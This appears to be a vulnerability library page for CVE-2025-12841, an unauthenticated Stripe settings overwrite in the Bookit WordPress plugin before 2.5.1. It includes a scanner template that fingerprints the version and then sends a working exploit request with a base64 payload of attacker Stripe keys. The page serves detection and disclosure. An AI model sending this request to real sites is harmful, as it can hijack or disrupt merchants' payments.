/Vulnerability Library

WordPress Bookit < 2.5.1 - Unauthenticated Stripe Settings Update

CVE-2025-12841
Verified

Description

Bookit WordPress plugin < 2.5.1 contains a broken access control vulnerability caused by a publicly accessible REST endpoint allowing unauthenticated update of Stripe payment options, letting remote attackers modify payment settings without authentication.

Severity

High

CVSS Score

8.2

Exploit Probability

1%

Published Date

May 19, 2026

Template Author

0x_akoko

CVE-2025-12841.yaml
id: CVE-2025-12841

info:
  name: WordPress Bookit < 2.5.1 - Unauthenticated Stripe Settings Update
  author: 0x_Akoko
  severity: high
  description: |
    Bookit WordPress plugin < 2.5.1 contains a broken access control vulnerability caused by a publicly accessible REST endpoint allowing unauthenticated update of Stripe payment options, letting remote attackers modify payment settings without authentication.
  impact: |
   Remote attackers can modify Stripe payment options without authentication, potentially leading to financial fraud or service disruption.
  remediation: |
   Upgrade to version 2.5.1 or later.
  reference:
    - https://wpscan.com/vulnerability/60cb3d5f-1aa5-4858-ab84-07fe7c023fdd/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-12841
    - https://wordpress.org/plugins/bookit/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L
    cvss-score: 8.2
    cve-id: CVE-2025-12841
    epss-score: 0.01129
    epss-percentile: 0.78804
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/bookit/"
  tags: cve,cve2025,wp,wp-plugin,wordpress,bookit,stripe,unauth,intrusive

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/bookit/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(to_lower(body), "bookit")'
          - 'compare_versions(version, "< 2.5.1")'
        internal: true
        condition: and

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?i)Stable tag:\s*([\w.]+)'
        internal: true

  - raw:
      - |
        GET /wp-json/bookit/v1/commerce/stripe/return?stripe=eyJzdHJpcGVfdXNlcl9pZCI6IkFDQ1RfSEFDS0VSIiwibGl2ZSI6eyJhY2Nlc3NfdG9rZW4iOiJza19saXZlX2hhY2tlciJ9LCJzYW5kYm94Ijp7ImFjY2Vzc190b2tlbiI6InNrX3Rlc3RfaGFja2VyIn0sImNsaWVudF9pZCI6ImNhX2hhY2tlciIsInB1Ymxpc2hhYmxlX2tleSI6InBrX2xpdmVfaGFja2VyIiwiY2xpZW50X3NlY3JldCI6InNrX2xpdmVfaGFja2VyIn0= HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains_all(to_lower(header), "bookit-settings", "x-redirect-by")'
        condition: and
# digest: 4a0a00473045022100c37f77f3f4fedc65e0d913636c293ceb181e1785c9e69e54f056dda9555f130b022026a2274187a0aa73ebb76ec8ecd523703831e7496eaeb7422605c9c0031938dd:922c64590222798bb761d5b6d8e72950
8.2Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L
CVE ID:
cve-2025-12841
CWE ID:
cwe-862

References

https://wpscan.com/vulnerability/60cb3d5f-1aa5-4858-ab84-07fe7c023fdd/https://nvd.nist.gov/vuln/detail/CVE-2025-12841https://wordpress.org/plugins/bookit/

Remediation Steps

Upgrade to version 2.5.1 or later.